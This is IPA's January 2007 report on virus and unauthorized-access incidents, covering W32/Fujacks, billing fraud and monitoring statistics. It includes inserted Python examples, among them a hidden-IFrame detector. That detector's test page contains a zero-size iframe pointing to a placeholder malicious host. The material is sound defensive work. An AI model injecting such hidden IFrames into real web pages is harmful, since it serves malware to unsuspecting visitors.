This is a summary of the computer virus/unauthorized computer access incident reports for January 2007 compiled by IPA.
Reminder for the Month: “Be Sure Not to Forget to Update!”
- Update Windows and Your Anti-virus Software Routinely! -
W32/Fujacks is a virus that exploits security holes in Windows to infect computers whose users do not run Windows Update. From December 2006 to January 2007, a number of consultations and reports about it were filed with IPA by individual users.
Overview of the Virus:
If the security holes in a Windows component that software uses for database access are left unresolved, W32/Fujacks infects the computer automatically when the user merely browses web content that the virus has infected. Be sure to run Windows Update regularly to prevent infection.
Once infected, a user may suffer damage such as theft of private information by embedded spyware or deletion of important files. Some W32/Fujacks variants are reported to replace the icons of infected files with the “.exe” extension with a picture of a panda burning joss sticks (refer to Chart 1 below).

Chart 1: Sample of Icons of Files Infected by Variants of W32/Fujacks
Files with the extensions “.exe”, “.htm”, “.php”, “.asp” and “.jsp” are targeted for infection. Since these file types are mainly used in creating web pages, infected files may end up being published on websites; as a result, infected files have been published on the sites of well-known businesses and of individual users. There were some reports of users being infected simply by accessing such a site.
Most traditional viruses spread via e-mail; by contrast, this virus uses websites as an infection path as well as e-mail. Users need to be all the more cautious, since it is possible to be infected simply by browsing ordinary websites.
How the Infection Spreads:
When W32/Fujacks runs, it infects files on that computer with the extensions “.exe”, “.htm”, “.asp”, “.php”, “.jsp”, etc. The virus can also carry out a dictionary attack: it tries to guess the administrator password of other computers reachable over the network, and if an easy password such as “admin” or “1234” is in use, it infects files on those computers or in their shared folders.
When W32/Fujacks infects an HTML file, it appends IFrame* code to it (refer to Chart 2). Because the code specifies “width=0 height=0”, the frame is 0 x 0 in size and nothing is visibly displayed when the page is browsed. The URL in the code points to a site from which the virus is downloaded.
Consequently, corporate or individual web authors may update their web pages without noticing the infection, with the result that infected HTML content is published.
When a user then accesses such a page, the user suffers damage: without the user's knowledge, the browser accesses the site designated by the IFrame* tag and downloads the virus-infected files, etc. placed there.
Web authors should check for unknown IFrame tags at the end of the HTML source before publishing web content.
*IFrame (Inline Frame): One of the HTML tags; it creates an inline frame that contains another document.
Chart 2: Example of an Infected HTML File
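The check recommended above, looking for an appended hidden IFrame before an HTML file is published, can be automated. The following Python script is an added example and is not code from the IPA report: the sample page it scans is constructed here, and the placeholder host malicious.example and the allowed_hosts list are assumptions. It flags frames that render at zero size or are hidden by CSS, frames whose src points to a host the site does not normally embed, and any content that follows the closing </html> tag.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (assumption, not from the report): one legitimate
# iframe in the body, and a zero-size iframe appended after </html> in the
# way the report describes. The host malicious.example is a placeholder.
SAMPLE_HTML = """<html><body>
<h1>Company news</h1>
<iframe src="/calendar.html" width="300" height="200"></iframe>
</body></html>
<iframe src="http://malicious.example/ad.htm" width=0 height=0></iframe>
"""


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag together with its line number."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # HTMLParser yields None for valueless attributes (e.g. <iframe hidden>)
            attrs = {k.lower(): (v or "") for k, v in attrs}
            self.iframes.append((attrs, self.getpos()[0]))


def _is_zero(value):
    """True for width/height values that render nothing: 0, "0", 0px, 0%."""
    return re.fullmatch(r"\s*0+(px|%)?\s*", value or "") is not None


def find_hidden_iframes(html, allowed_hosts=()):
    """Return findings for iframes that are invisible or point to a host
    not in allowed_hosts. Each finding: {"line", "src", "reasons"}."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs, line in parser.iframes:
        reasons = []
        if _is_zero(attrs.get("width")) or _is_zero(attrs.get("height")):
            reasons.append("zero-size frame")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        src = attrs.get("src", "")
        host = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", src, re.I)
        if host and host.group(1).lower() not in allowed_hosts:
            reasons.append("external src " + host.group(1))
        if reasons:
            findings.append({"line": line, "src": src, "reasons": reasons})
    return findings


def has_trailing_content(html):
    """True if anything other than whitespace follows the last </html>;
    the report notes the injected IFrame is appended at the end of the file."""
    idx = html.lower().rfind("</html>")
    return idx >= 0 and html[idx + len("</html>"):].strip() != ""


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML, allowed_hosts=("www.example.com",)):
        print("line %d: %s (%s)" % (f["line"], f["src"], ", ".join(f["reasons"])))
    if has_trailing_content(SAMPLE_HTML):
        print("content found after </html>: inspect before publishing")
```

Run it over every file with the extensions listed above as part of the publishing step; a zero-size frame or a src on an unfamiliar host is a reason to hold the upload and scan the authoring machine.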
To prevent such damage and to keep the virus from spreading further, be sure to take the following countermeasures:
Countermeasures:
- Resolve security holes (update the OS and applications)
- Scan for viruses regularly, keeping the virus signatures of the anti-virus software up to date
- Do not open attachments to suspicious e-mails
- Check the HTML source before updating web content
Information relevant to anti-virus measures:
Information on anti-virus software (in Japanese)
http://www.ipa.go.jp/security/antivirus/vacc-info.html
Five must-dos for dealing with files attached to e-mail (in Japanese)
http://www.ipa.go.jp/security/antivirus/attach5.html
Seven anti-virus requirements for computer users (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
Information on how to resolve security holes (in Japanese):
“Procedure for Using Windows Update (Microsoft)”
http://www.microsoft.com/japan/athome/security/square/guard/WU5Steps.mspx
I. Reporting Status for Computer Virus
– for further details, please refer to Attachment 1 –
The detection number [1] of viruses for January was about 1.02M, a 22.2% decrease from the 1.31M reported in December. The reported number [2] of viruses was about 3,513, a 9.4% increase from the 3,212 reported in December.
[1] Detection number: the cumulative count of viruses found by a filer.
[2] Reported number: the aggregated count of cases. Viruses of the same type, including its variants, reported by the same filer on the same day are counted as one case, regardless of how many viruses were actually found by that filer on that day. In December the reported number was 3,212, against an aggregated detection number of about 1.31M.
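As an added illustration, not part of the IPA report, of how the two figures differ, the following Python snippet applies the aggregation rule in footnote [2] to a constructed list of detection records: every record counts toward the detection number, while records from the same filer on the same day for the same virus family (variants such as .P and .Q included) collapse into one case for the reported number. The record layout, the variant names and the split-at-first-dot rule for deriving the family are assumptions.

```python
from collections import defaultdict

# Constructed sample of individual detection records (assumption):
# (date, filer, detected name). Variant suffixes belong to one family.
SAMPLE_DETECTIONS = [
    ("2007-01-10", "filer-A", "W32/Netsky.Q"),
    ("2007-01-10", "filer-A", "W32/Netsky.Q"),    # same filer/day/family
    ("2007-01-10", "filer-A", "W32/Netsky.P"),    # variant: still one case
    ("2007-01-10", "filer-A", "W32/Nuwar.A"),
    ("2007-01-11", "filer-A", "W32/Netsky.Q"),    # next day: new case
    ("2007-01-10", "filer-B", "W32/Netsky.Q"),    # other filer: new case
    ("2007-01-10", "filer-B", "W32/Stration.GD"),
]


def family(name):
    """Strip the variant suffix (assumed to follow the first dot):
    'W32/Netsky.Q' -> 'W32/Netsky'."""
    return name.split(".", 1)[0]


def aggregate(detections):
    """Return (detection_number, reported_number, per_family).

    detection_number: every record counts (footnote [1]).
    reported_number: distinct (date, filer, family) cases (footnote [2]).
    per_family: family -> (detections, reports) for the monthly ranking.
    """
    cases = set()
    fam_detections = defaultdict(int)
    fam_cases = defaultdict(set)
    for date, filer, name in detections:
        fam = family(name)
        key = (date, filer, fam)
        cases.add(key)
        fam_detections[fam] += 1
        fam_cases[fam].add(key)
    per_family = {f: (fam_detections[f], len(fam_cases[f])) for f in fam_detections}
    return len(detections), len(cases), per_family


def rank_by_detections(per_family):
    """Families in descending order of detection number, as in the monthly ranking."""
    return sorted(per_family, key=lambda f: per_family[f][0], reverse=True)


if __name__ == "__main__":
    det, rep, per_family = aggregate(SAMPLE_DETECTIONS)
    print("detection number:", det, " reported number:", rep)
    for fam in rank_by_detections(per_family):
        print("%-14s detections=%d reports=%d" % ((fam,) + per_family[fam]))
```

The same key (date, filer, family) is what makes a mass-mailing worm such as W32/Netsky dominate the detection number while contributing far fewer cases to the reported number.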
The largest detection number was for W32/Netsky with about 0.62M, followed by W32/Nuwar with about 0.14M and W32/Stration with about 0.09M.

Chart 1-1

Chart 1-2
II. One-click Billing Fraud
The number of consultations about “one-click billing fraud” for January 2007 was 233, a sharp increase from the 155 and 130 reported in November and December respectively.
Throughout 2006 the main cause was damage from clicking on adult sites; in January 2007, however, the cause shifted to sites with information about entertainers, which lure users to suspicious sites.
Among the consultations accepted by IPA, some reported damage from one-click billing fraud while the user was searching for videos or images of a certain entertainer. Be cautious, as there is a risk of billing fraud even when you do not intend to browse adult sites.
Most of the damage was caused by downloading malicious code such as viruses: when the user clicks an item about membership registration on an entertainer's site, the user is sent to an adult site without knowing it, and when the user clicks images or videos there believing them to be free, a virus, etc. is downloaded automatically.
If you only wish to display a video or image, no “Security Alert” dialog is displayed; it appears only when a program file is about to be downloaded. Clicking “Run” or “Save” in that dialog can therefore download malicious code. Unless you intend to download a program, be sure to click “Cancel” and go no further.

Please feel free to consult IPA if you have suffered damage from malicious code, etc. (refer to IV. Accepting Status of Consultation).
III. Reporting Status for Unauthorized Computer Access (includes Consultations)
– please refer to Attachment 2 –
Reports of unauthorized computer access and status of consultations
                          | Aug. | Sept. | Oct. | Nov. | Dec. | Jan.'07
Total Reported (a)        |   50 |    46 |   22 |   24 |   10 |      32
  Damaged (b)             |   30 |    21 |   15 |    8 |    9 |      22
  Not Damaged (c)         |   20 |    25 |    7 |   16 |    1 |      10
Total Consultations (d)   |   24 |    35 |   53 |   30 |   40 |      52
  Damaged (e)             |   13 |    26 |   37 |   20 |   23 |      25
  Not Damaged (f)         |   11 |     9 |   16 |   10 |   17 |      27
Grand Total (a + d)       |   74 |    81 |   75 |   54 |   50 |      84
  Damaged (b + e)         |   43 |    47 |   52 |   28 |   32 |      47
  Not Damaged (c + f)     |   31 |    34 |   23 |   26 |   18 |      37
(1) Reporting Status of Unauthorized Computer Access
The reported number for January was 32, of which 22 involved actual damage.
(2) Accepting Status of Consultations Relevant to Unauthorized Computer Access, etc.
The number of consultations relevant to unauthorized computer access was 52, of which 25 (3 of them also counted among the reports) involved some sort of damage.
(3) Status of Damage
The breakdown of the damage reports was: intrusion 1, source address spoofing 2, and others (damaged) 19.
The damage caused by the intrusion was alteration of files (1). The cause of the intrusion was exploitation of a vulnerability in web server software.
Damage Instances:
[Intrusion]
(i) Attack on a Homepage
<Instance>
- A user who browsed this business's site reported that the site might have been altered.
- The site administrator investigated and found that political or religious content unknown to them had been placed in a program folder of the website, which is run on a hosting service (*1).
- Since nothing suspicious could be found in the FTP access log, the intrusion was probably made by exploiting a vulnerability in the web server software.
[Others (Damaged)]
(ii) Damage by Bot
<Instance>
- Suspicious IRC (*2) communication and port scans to 445/tcp were detected on the campus network.
- The network administrator investigated and found that several computers on campus were infected by a bot.
IV. Accepting Status of Consultation
The total number of consultations for January was 946. Of these, consultations relevant to “One-click Billing Fraud” numbered 233 (December: 130), those relevant to “High-pressure selling of security software” 13 (December: 15), and those relevant to “Winny” 17 (December: 15), etc.
Trend in the total number of consultations accepted by IPA

                            | Aug. | Sept. |  Oct. | Nov. | Dec. | Jan.'07
Total                       |  793 |   933 | 1,002 |  711 |  680 |     946
  Automatic Response System |  460 |   575 |   580 |  423 |  394 |     582
  Telephone                 |  280 |   302 |   326 |  214 |  222 |     324
  e-mail                    |   48 |    51 |    93 |   72 |   59 |      39
  Fax, Others               |    5 |     5 |     3 |    2 |    5 |       1
*IPA gives consultation and advice on computer viruses and unauthorized computer access as well as on other information security issues in general.
Mail: for virus issues, for crack issues.
Tel.: +81-3-5978-7509 (24-hour automatic response)
Fax: +81-3-5978-7518 (24-hour automatic response)
*The total number of cases includes the numbers in the Consultations (d) row of the table in “III. Reporting Status for Unauthorized Computer Access” as well as those in “IV. Accepting Status of Consultation”.
*“Automatic Response System”: number of cases accepted by the automatic response system
*“Telephone”: number of cases accepted by Security Center personnel
<Reference>
Trend in the number of consultations about one-click billing fraud

Please refer to the following links for measures against one-click billing fraud.
Reminder for the Month (for January 2006) “Malicious Code may be Installed if you Ignore the Alert!!”
http://www.ipa.go.jp/security/english/virus/press/200601/E_PR200601.html
Reporting Status of Computer Virus and Unauthorized Computer Access for September and the 3rd Quarter, 2. One-click Billing Fraud
http://www.ipa.go.jp/security/english/virus/press/200609/E_PR200609.html
Reporting Status of Computer Virus and Unauthorized Computer Access for August, 2. The Number of Consultations about Damage by One-click Billing Fraud Remains High!!
http://www.ipa.go.jp/security/english/virus/press/200608/E_PR200608.html
<Reference>
Trend in the number of consultations about high-pressure selling of security software

For high-pressure selling of security software, please also refer to the following link.
Reminder for the Month (for April) “Be Cautious of High-pressure Selling of Security Software!!”
http://www.ipa.go.jp/security/english/virus/press/200604/E_PR200604.html
The major consultations for the month are as follows.
(i) Deceived by a mail masquerading as an Internet settlement service?!
Consultation:
I made a remittance via an Internet settlement service and received a mail informing me that the remittance had been completed. However, I was then urged by another mail to do so again. When I inquired with the settlement service, I learned that they had sent no mail other than the one informing me that the remittance was done. The mail urging me to input private information seemed to be a fake.
Response:
It seems that this user faced phishing (*3) fraud. To prevent subsequent damage, it is effective to change the mail address and/or credit card number. If private information is used illegally, purchases that the legitimate user knows nothing about may appear in his/her credit card billing statement. When facing such trouble, be sure to contact the credit card company you deal with. It is also good to consult the consumer center in your area.
<Reference>
National Consumer Affairs
Center of Japan
http://www.kokusen.go.jp/map/
(ii) About Security Countermeasures
Consultation:
Is installing certain security software enough to protect against viruses and spyware? Are there any other measures?
Response:
Even with anti-virus and/or anti-spyware software installed, there remains some risk that it will not detect unknown unauthorized programs, so it is not totally safe. The following MUST DOs can be considered as further preventive measures.
- Keep all the programs you use up to date.
- Do not open files whose source cannot be identified.
- Do not browse suspicious sites.
- Disable scripting functions in the web browser.
In addition, installing software such as a personal firewall, configured so that only programs whose legitimacy has been confirmed can connect to the Internet, helps prevent the leakage of important/private information in case an unauthorized program has been planted.
<Reference>
Ministry of Economy, Trade and Industry – CHECK PC! Campaign (until March 31, 2007) (in Japanese)
http://www.checkpc.go.jp/
IPA – Security Alert on Preventing Damage by Spyware (in Japanese)
http://www.ipa.go.jp/security/topics/170720_spyware.html
V. Access Status Captured by Internet Monitoring (TALOT2) in January
According to Internet Monitoring (TALOT2), the total number of unwanted (one-sided) accesses in January 2007 was 492,760 across 10 monitoring points. That is, there were 1,590 accesses from 390 source addresses per monitoring point per day.
Each TALOT2 monitoring environment is nearly the same as the ordinary connection environment used for the Internet, so it can be considered that the same amount of unwanted (one-sided) access reaches ordinary Internet users' connections. In other words, your computer is being accessed by an average of 390 unknown source addresses per day, or about 4 times per source address, and such access can be considered unauthorized.

Chart 5.1: Number of Unwanted (One-sided) Accesses and Number of Source Addresses per Monitoring Point per Day
Chart 5.1 shows the average number of accesses and number of source addresses per monitoring point per day from August 2006 to January 2007. According to the chart, unwanted (one-sided) accesses increased slightly compared with December. This tendency is due to an increase in Ping (ICMP*) accesses and in accesses targeting newer vulnerabilities in computers.
The overall content of the accesses is stable: it can be considered that most accesses are bot infection activity (accesses that attempt to spread bot infection by targeting vulnerabilities in computers) from computers already infected by bots.
The access status in January 2007 was much the same overall as in December 2006: the increase in Ping (ICMP) accesses and in accesses targeting vulnerabilities in Symantec Client Security and Symantec AntiVirus (accesses to port 2967/tcp) continued, as described previously.
* Internet Control Message Protocol: a protocol used, among other things, to check whether a computer on the other side is operating.
Since TALOT2 monitors accesses from the Internet passively (one-sidedly), it does not respond to Ping (ICMP). Accordingly, TALOT2 cannot observe the accesses that would follow if the Ping (ICMP) were answered; such pings can be considered checks of whether the computers targeted for attack are in operation.

Chart 5.2: Ping (ICMP) Accesses
Chart 5.2 shows the trend in the number of Ping (ICMP) accesses classified by source region; the increase in Ping (ICMP) accesses from the China region is remarkable. Accesses from the other source regions remain at a roughly constant level (with a slight increase).
For additional information, please refer to the following site.
Attachment 3: Observation Status Captured by Internet Monitoring (TALOT2)
http://www.ipa.go.jp/security/english/virus/press/200701/TALOT200701.html
“Various Statistics Provided by Other Organizations/Vendors are Published on the Following Sites”
@police: http://www.cyberpolice.go.jp/english/
Trend Micro: http://www.trendmicro.com/en/home/us/home.htm
McAfee: http://www.mcafee.com/us/
“Glossary”
(*1) Hosting Service: a business that rents clients part of the disk capacity of a web server connected to the Internet, for publishing content. Also referred to as a rental server.
(*2) IRC (Internet Relay Chat): a chat system (real-time conversation between users connected to the Internet). By connecting to an IRC server on the Internet with dedicated software, a user can exchange messages with multiple users; users can also exchange files via the system.
(*3) Phishing: illegally spoofing or masquerading as the mail or web pages of existing businesses such as banks, etc. to steal the user IDs and passwords of legitimate users who open or browse such mails or web pages. “Fishing” is the origin of the word “phishing”, but there are several theories, such as that “f” was replaced by “ph” according to hackers' naming conventions, that it is a coinage from “sophisticated” and “fish”, or that it is a shortened form of “password harvesting fishing”, etc.
The details are as follows:
- Attachment 1: Computer Virus Incident Report [Details]
- Attachment 2: Unauthorized Computer Access Incident Report [Details]
- Attachment 3: Observation Status by Internet Monitoring System (TALOT2)